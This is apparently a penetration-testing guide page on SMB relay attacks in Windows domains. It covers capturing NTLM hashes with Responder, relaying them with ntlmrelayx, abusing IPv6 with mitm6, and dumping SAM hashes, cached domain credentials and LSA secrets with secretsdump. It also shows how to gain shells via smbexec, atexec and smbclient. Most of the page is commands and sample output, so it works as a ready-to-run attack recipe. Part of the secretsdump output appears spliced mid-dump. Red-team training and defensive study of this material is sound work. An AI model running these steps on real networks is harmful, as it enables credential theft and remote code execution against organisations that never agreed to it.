SMB Relay

This page deals with gaining code execution relaying NTLMv1/2 hashes in a very effective manner.

Introduction

When capturing a NTLMv1/2 hashes with tools like Responder, attackers have two options:

• crack it to retrieve cleartext passwords

• relay it to gain code execution on a target

The relayed user must have privilege on the target.

Valid targets

In order to relay hashes, we must have valid targets. Valid targets are machines with SMB Signing disabled.

SMB Signing is disabled by default on every Windows OS, except Windows Server.

To create a list file of valid targets, use CrackMapExec:

cme smb <networkIP>/<cidr> --gen-relay-list relayTargets.txt

Capture hashes

To capture NTLMv2 hashes, simply use Responder. Before running it, edit the Responder.conf:

[Responder Core]

; Servers to start
SQL = On
SMB = Off     # Turn this off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off    # Turn this off
HTTPS = On
DNS = On
LDAP = On

Then fire up Responder:

python Responder.py -I <interface> -r -d -w

Relaying hashes

Instead of cracking Responder hashes, we can relay it to our valid targets to gain code execution on it. For that purpose, you can use Responder's MultiRelay or Impacket's ntlmrelayx.

With ntlmrelayx, you can use and reuse sessions instead of executing a one-shot attack.

One-Shot Attack vs Socks Support.

To use SOCKS support, simply use -sock switch:

./ntlmrelayx.py -tf relayTargets.txt -socks -smb2support

Since MS08-068, it is impossible to relay a hash back to the machine it comes from (reflective attack).

Abusing IPv6

Until now, we have abused LLMNR protocol to capture NTLMv2 hashes. It works great, but we can increase the effectiveness of hash relaying by abusing IPv6 protocol too.

The idea is to reply to DHCPv6 requests made by machines on the network to set the attacker IP as the default IPv6 DNS server in order to force victims to authenticate against our attacker machine because of the IPv6 priority over IPv4 in Windows.

Abusing IPv6 protocol with mitm6.

To use mitm6:

sudo mitm6 -d <domain>

To minimize the impact on the network, the lease will expire within 5 minutes when mitm6 is stopped, which will remove the DNS server from the victims configuration.

What to do with sessions?

Many sessions will be established by chaining these exploits:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143
...

To interact with these sessions, you need to edit /etc/proxychains.conf:

[ProxyList]
socks4 <yourIP> 1080

Retrieving local hashes

Then you can retrieve targets local hashes with Impacket's secretsdump:

You can type anything when you are prompted for a password.

root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
 0000   01 00 00 00 1C 17 F6 05  23 2B E5 97 95 E0 E4 DF   ........#+......
 0010   47 96 CC 79 1A C2 6E 14  44 A3 C1 9E 6D 7C 93 F3   G..y..n.D...m|..
 0020   9A EC C6 8A 49 79 20 9D  B5 FB 26 79               ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
 0000   EB 5C 93 44 7B 08 65 27  9A D8 36 75 09 A9 CF B3   .\.D{.e'..6u....
 0010   4F AF EC DF 61 63 93 E5  20 C5 4F EF 3C 65 FD 8C   O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK

Getting code execution

You also can obtain a shell with Impacket's smbexec and atexec:

proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60

proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"

psexec or wmiexec do not work here (see references).

Using SMBClient

You can use SMBClient:

root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter VULNERABLE\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Thu Dec  7 19:08:00 2017
  Documents and Settings            DHS        0  Tue Jul 14 01:08:10 2009
  pagefile.sys                      AHS 1073741824  Thu May  3 16:32:43 2018
  PerfLogs                            D        0  Mon Jul 13 23:20:08 2009
  Program Files                      DR        0  Fri Dec  1 17:16:28 2017
  Program Files (x86)                DR        0  Fri Dec  1 17:03:57 2017
  ProgramData                        DH        0  Tue Feb 27 15:02:13 2018
  Recovery                          DHS        0  Wed Sep 30 18:00:31 2015
  System Volume Information         DHS        0  Wed Jun  6 12:24:46 2018
  tmp                                 D        0  Sun Mar 25 09:49:15 2018
  Users                              DR        0  Thu Dec  7 19:07:54 2017
  Windows                             D        0  Tue Feb 27 16:25:59 2018

		5216767 blocks of size 4096. 609996 blocks available
smb: \>

Many other protocols can be relayed: imap, ldap, mssql, etc (see references).

References

• aas' gitbook

• byt3bl33d3's blog

• secureauth's blog

• secureauth's github

• fox-it's blog